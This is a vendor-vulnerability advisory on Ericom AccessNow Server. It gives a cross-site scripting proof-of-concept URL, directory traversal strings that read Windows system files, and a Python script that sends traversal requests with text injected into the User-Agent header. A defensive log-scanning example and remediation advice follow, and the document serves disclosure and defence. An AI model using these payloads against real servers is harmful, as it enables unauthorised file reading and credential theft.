
Commissum Technical Advisory – Ericom AccessNow Server Weaknesses



Ericom AccessNow Server 2.x Multiple Vulnerabilities

Introduction

This document is a technical advisory for weaknesses found in Ericom AccessNow Server. It is being released to alert Ericom customers to the risks detailed below and to request remediation. Please note that this document may be subject to modification as new information becomes available.

Summary

Commissum Senior Consultant Liam Romanis identified a number of vulnerabilities in Ericom AccessNow Server version 3.4.0.4031 installed at a client's site, including:

  • Cross-Site Scripting: An attacker may be able to inject malicious JavaScript with the intention of stealing users' login credentials or to facilitate other attacks such as clickjacking.
  • Directory Traversal: An attacker may be able to retrieve arbitrary files from the host operating system of the Ericom AccessNow Server.

Through further interaction with the vendor and the client we were able to establish that version 2.x (including 2.2 and 2.4) is also vulnerable.

Cross-Site Scripting Proof Of Concept

This proof of concept attack string is provided for customers to attempt to replicate the issue:

http://<AccessNow_Server_IP>:<port>/AccessNow/"><script>alert(123)</script>.html

This request should result in a message box being displayed containing the text "123".

Directory Traversal

The effective attack string for this issue is:

https://<Ericom_AccessNow_Server_IP>:<port>/AccessNow/../../../../../../../../../../../../windows/system.ini

However, it should be noted that it did not appear possible to exploit this issue using a request sent from a browser.

This proof of concept attack script is provided for customers to attempt to replicate the issue:

#!/usr/bin/python
# Liam Romanis 24/03/2015
# http://commissum.org
#
# Directory Traversal in Ericom AccessNow Server version 3.4.0.4031
# Python 2 script: replace <ip address> with the address of the server under test.
import urllib2

URL = "https://<ip address>:8080/../../../../../../../../../../../../windows/win.ini"

print "[+] Attempting test - Once you see ~$ hit return to see contents of file"

while True:
    command = raw_input("~$ ")
    opener = urllib2.build_opener()
    # The traversal request is sent directly (not via a browser), with the
    # entered text appended to the User-agent header.
    opener.addheaders = [('User-agent', '(); Content-Type: text/plain ;' + command)]
    try:
        response = opener.open(URL)
        for line in response.readlines():
            print line.strip()
    except Exception as e:
        print e
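As a defender-side complement to the two proof-of-concept strings above, the following added example (not part of the advisory or of Ericom's software) scans web-server access-log lines for the three request patterns they describe: a path that climbs above the web root, a URL-encoded script tag, and an HTTP header smuggled into the User-Agent. The log lines, addresses and timestamps are constructed, and the combined log format is an assumption about the server's logging.

```python
import re
import urllib.parse
# Constructed sample lines (combined log format), not taken from the advisory; the
# paths mirror the PoC strings above and the last User-Agent mirrors the PoC script.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2015:10:01:02 +0000] "GET /AccessNow/start.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2015:10:01:07 +0000] "GET /AccessNow/%22%3E%3Cscript%3Ealert(123)%3C/script%3E.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2015:10:01:15 +0000] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 219 "-" "(); Content-Type: text/plain ;type"
10.0.0.7 - - [24/Mar/2015:10:02:00 +0000] "GET /AccessNow/images/logo.png HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def traversal_depth(path):
    """How many levels a path climbs above the web root via '..' segments (0 if none)."""
    depth, worst = 0, 0
    for seg in path.split('?', 1)[0].split('/'):
        if seg == '..':
            depth -= 1
            worst = min(worst, depth)
        elif seg not in ('', '.'):
            depth += 1
    return -worst

def classify(path, user_agent=''):
    """Return the list of findings for one request; an empty list means nothing suspicious."""
    decoded = urllib.parse.unquote(path)  # catch %2e%2e and %3Cscript%3E encodings
    findings = []
    if traversal_depth(decoded) > 0:
        findings.append('directory-traversal')
    if re.search(r'<\s*script|javascript:', decoded, re.I):
        findings.append('xss-probe')
    if re.search(r'content-type\s*:', user_agent, re.I):  # header injected via the UA
        findings.append('header-in-user-agent')
    return findings

def scan_log(text):
    """Return (ip, path, findings) for every suspicious line in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group('path'), m.group('ua'))
        if findings:
            hits.append((m.group('ip'), m.group('path'), findings))
    return hits
```

Because browsers collapse `..` segments before sending a request, traversal hits in the log come from non-browser clients such as the script above, which is consistent with the advisory's note that the issue could not be reproduced from a browser.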

 

Remediation

Customers are advised to upgrade all Ericom AccessNow servers to the latest version (3.5.x).